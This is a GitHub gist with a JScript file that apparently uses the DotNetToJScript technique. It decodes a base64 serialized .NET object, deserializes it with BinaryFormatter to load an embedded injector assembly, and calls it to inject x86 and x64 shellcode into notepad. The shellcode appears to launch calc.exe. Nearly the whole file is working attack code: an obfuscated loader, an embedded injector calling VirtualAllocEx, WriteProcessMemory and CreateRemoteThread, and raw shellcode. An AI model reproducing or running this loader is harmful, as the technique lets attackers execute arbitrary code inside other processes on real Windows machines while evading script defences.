Skip to content

Instantly share code, notes, and snippets.

@manilz

manilz/dotnettojsautoexec.js

Created March 17, 2023 02:29
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save manilz/35d001e0e7064fc6fe5ee0d45b8b84a6 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save manilz/35d001e0e7064fc6fe5ee0d45b8b84a6 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
dotnettojsautoexec.js
(function(){
function setversion() {
new ActiveXObject('WScript.Shell').Environment('Process')('COMPLUS_Version') = 'v4.0.30319';
}
function debug(s) {}
function base64ToStream(b) {
var enc = new ActiveXObject("System.Text.ASCIIEncoding");
var length = enc.GetByteCount_2(b);
var ba = enc.GetBytes_4(b);
var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");
ba = transform.TransformFinalBlock(ba, 0, length);
var ms = new ActiveXObject("System.IO.MemoryStream");
ms.Write(ba, 0, (length / 4) * 3);
ms.Position = 0;
return ms;
}
var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+
"AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+
"dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+
"ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+
"AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+
"RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+
"eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"+
"cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"+
"aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"+
"MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"+
"dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"+
"ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"+
"B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"+
"dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"+
"CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"+
"SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"+
"cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"+
"AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"+
"AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"+
"bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"+
"NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"+
"ZW1ibHkGFwAAAARMb2FkCg8MAAAAABIAAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"+
"YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMASGGxWgAAAAAA"+
"AAAA4AACIQsBCwAACgAAAAYAAAAAAAAeKQAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA"+
"AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAzCgA"+
"AE8AAAAAQAAAqAIAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"+
"AAAALnRleHQAAAAkCQAAACAAAAAKAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAqAIAAABA"+
"AAAABAAAAAwAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAQAAAAAAAAAAAA"+
"AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAAApAAAAAAAASAAAAAIABQD8IAAA0AcAAAEAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKgIoBAAACgAA"+
"ACoAEzAHAJIAAAABAAARACgGAAAKGv4BFv4BEwcRBy0GAAMKACsEAAQKAAYoBwAACgsFKAgAAAoW"+
"mgwIbwkAAAooCgAACgAgOgQAABYIbwkAAAooAgAABg0JfgsAAAoHjmkgADAAAB9AKAUAAAYTBAkR"+
"BAcHjmkSBSgGAAAGJgl+CwAAChYRBH4LAAAKFn4LAAAKKAcAAAYmFhMGKwARBioAAEJTSkIBAAEA"+
"AAAAAAwAAAB2NC4wLjMwMzE5AAAAAAUAbAAAAOgCAAAjfgAAVAMAAIwDAAAjU3RyaW5ncwAAAADg"+
"BgAACAAAACNVUwDoBgAAEAAAACNHVUlEAAAA+AYAANgAAAAjQmxvYgAAAAAAAAACAAABVx0CFAkA"+
"AAAA+iUzABYAAAEAAAAJAAAAAgAAAAkAAAAIAAAAGgAAAAsAAAAJAAAAAgAAAAEAAAACAAAABgAA"+
"AAEAAAACAAAAAAAKAAEAAAAAAAYAMgArAAYAGgL7AQYApAKEAgYAxAKEAgYA7AL7AQYAFQMrAAYA"+
"JQMrAAoAUQM+AwYAcwMrAAAAAAABAAAAAAABAAEAAQAQABgAAAAFAAEAAQBRgDkACgBRgE8ACgBR"+
"gGkACgBRgH4ACgBRgI8ACgBRgJ8AJgBRgKoAJgBRgLYAJgBRgMUAJgBQIAAAAACGGNwAPQABAAAA"+
"AACAAJYg4gBBAAEAAAAAAIAAliDuAEgABAAAAAAAgACRIP4ATQAFAAAAAACAAJEgDQFTAAcAAAAA"+
"AIAAkSAcAVwADAAAAAAAgACRIC8BZwARAFwgAAAAAIYAQgFyABgAAAABAEkBAAACAFkBAAADAGgB"+
"AAABAHQBAAABAIEBAAACAIkBAAABAJIBAAACAJsBAAADAKUBAAAEAKwBAAAFAL0BAAABAJIBAAAC"+
"AMcBAAADANUBAAAEAN4BAgAFAOQBAAABAJIBAAACACcCAAADADoCAAAEAEYCAAAFAFUCAAAGAGEC"+
"AAAHAHECAAABAHwCAAACAIACAAADAIkBEQDcAD0AGQDcAHkAIQDcAD0ACQDcAD0AKQDcAH4AMQAc"+
"A4MAOQAtA4cAQQBZA40AQQBsA5QASQB7A5gAMQCFA50ACAAEAA0ACAAIABIACAAMABcACAAQABwA"+
"CAAUACEACQAYACkACQAcAC4ACQAgADMACQAkADgALgATAK0ALgAbALYAoAD/AgwDAAEFAOIAAQAG"+
"AQcA7gABAEMBCQD+AAIAQQELAA0BAQBAAQ0AHAEBAAABDwAvAQEABIAAAAAAAAAAAAAAAAAAAAAA"+
"4gIAAAQAAAAAAAAAAAAAAAEAIgAAAAAABAAAAAAAAAAAAAAAAQArAAAAAAAAAAA8TW9kdWxlPgBI"+
"VEFJbmplY3QuZGxsAFRlc3RDbGFzcwBtc2NvcmxpYgBTeXN0ZW0AT2JqZWN0AFBST0NFU1NfQ1JF"+
"QVRFX1RIUkVBRABQUk9DRVNTX1FVRVJZX0lORk9STUFUSU9OAFBST0NFU1NfVk1fT1BFUkFUSU9O"+
"AFBST0NFU1NfVk1fV1JJVEUAUFJPQ0VTU19WTV9SRUFEAE1FTV9DT01NSVQATUVNX1JFU0VSVkUA"+
"UEFHRV9SRUFEV1JJVEUAUEFHRV9FWEVDVVRFX1JFQURXUklURQAuY3RvcgBPcGVuUHJvY2VzcwBH"+
"ZXRNb2R1bGVIYW5kbGUAR2V0UHJvY0FkZHJlc3MAVmlydHVhbEFsbG9jRXgAV3JpdGVQcm9jZXNz"+
"TWVtb3J5AENyZWF0ZVJlbW90ZVRocmVhZABJbmplY3QAZHdEZXNpcmVkQWNjZXNzAGJJbmhlcml0"+
"SGFuZGxlAGR3UHJvY2Vzc0lkAGxwTW9kdWxlTmFtZQBoTW9kdWxlAHByb2NOYW1lAGhQcm9jZXNz"+
"AGxwQWRkcmVzcwBkd1NpemUAZmxBbGxvY2F0aW9uVHlwZQBmbFByb3RlY3QAbHBCYXNlQWRkcmVz"+
"cwBscEJ1ZmZlcgBuU2l6ZQBscE51bWJlck9mQnl0ZXNXcml0dGVuAFN5c3RlbS5SdW50aW1lLklu"+
"dGVyb3BTZXJ2aWNlcwBPdXRBdHRyaWJ1dGUAbHBUaHJlYWRBdHRyaWJ1dGVzAGR3U3RhY2tTaXpl"+
"AGxwU3RhcnRBZGRyZXNzAGxwUGFyYW1ldGVyAGR3Q3JlYXRpb25GbGFncwBscFRocmVhZElkAHg4"+
"NgB4NjQAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBDb21waWxhdGlvblJlbGF4YXRp"+
"b25zQXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAEhUQUluamVjdABEbGxJ"+
"bXBvcnRBdHRyaWJ1dGUAa2VybmVsMzIuZGxsAGtlcm5lbDMyAEludFB0cgBnZXRfU2l6ZQBDb252"+
"ZXJ0AEZyb21CYXNlNjRTdHJpbmcAU3lzdGVtLkRpYWdub3N0aWNzAFByb2Nlc3MAR2V0UHJvY2Vz"+
"c2VzQnlOYW1lAGdldF9JZABDb25zb2xlAFdyaXRlTGluZQBaZXJvAAAAAAMgAAAAAACYOUOmVZX0"+
"Tr1fZSUxEnD/AAi3elxWGTTgiQIGCAQCAAAABAAEAAAECAAAAAQgAAAABBAAAAACBgkEABAAAAQA"+
"IAAABAQAAAAEQAAAAAMgAAEGAAMYCAIIBAABGA4FAAIYGA4IAAUYGBgJCQkKAAUCGBgdBQkQGQoA"+
"BxgYGAkYGAkYBiADCA4ODgQgAQEIBCABAQ4DAAAIBQABHQUOBgABHRIhDgMgAAgEAAEBCAIGGAwH"+
"CA4dBRIhGBgZCAIIAQAIAAAAAAAeAQABAFQCFldyYXBOb25FeGNlcHRpb25UaHJvd3MBAAAA9CgA"+
"AAAAAAAAAAAADikAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAApAAAAAAAAAAAAAAAAX0NvckRs"+
"bE1haW4AbXNjb3JlZS5kbGwAAAAAAP8lACAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAA"+
"AAEAAQAAADAAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAEgAAABYQAAATAIAAAAAAAAAAAAATAI0AAAA"+
"VgBTAF8AVgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAAAAAAAAAAAAAAAAAAA"+
"AD8AAAAAAAAABAAAAAIAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8A"+
"AAAAACQABAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBKwBAAABAFMAdAByAGkAbgBn"+
"AEYAaQBsAGUASQBuAGYAbwAAAIgBAAABADAAMAAwADAAMAA0AGIAMAAAACwAAgABAEYAaQBsAGUA"+
"RABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAAAgAAAAMAAIAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBu"+
"AAAAAAAwAC4AMAAuADAALgAwAAAAPAAOAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABIAFQA"+
"QQBJAG4AagBlAGMAdAAuAGQAbABsAAAAKAACAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0"+
"AAAAIAAAAEQADgABAE8AcgBpAGcAaQBuAGEAbABGAGkAbABlAG4AYQBtAGUAAABIAFQAQQBJAG4A"+
"agBlAGMAdAAuAGQAbABsAAAANAAIAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAMAAu"+
"ADAALgAwAC4AMAAAADgACAABAEEAcwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAwAC4A"+
"MAAuADAALgAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAACAAAAwAAAAgOQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAABDQAAAAQAAAAJFwAAAAkGAAAACRYAAAAGGgAAACdTeXN0ZW0uUmVm"+
"bGVjdGlvbi5Bc3NlbWJseSBMb2FkKEJ5dGVbXSkIAAAACgsA";
var entry_class = 'TestClass';
try {
setversion();
var stm = base64ToStream(serialized_obj);
var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');
var al = new ActiveXObject('System.Collections.ArrayList');
var d = fmt.Deserialize_2(stm);
al.Add(undefined);
var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);
var x64 = "/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu/C1olZBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY2FsYy5leGUA";
var x86 = "/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1qAY2FsgAAAFBoMYtvh//Vu/C1olZoppW9nf/VPAZ8CoD74HUFu0cTcm9qAFP/1WNhbGMuZXhlAA==";
var ret = o.Inject(x86, x64, 'notepad');
} catch (e) {
debug(e.message);
}
})();
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment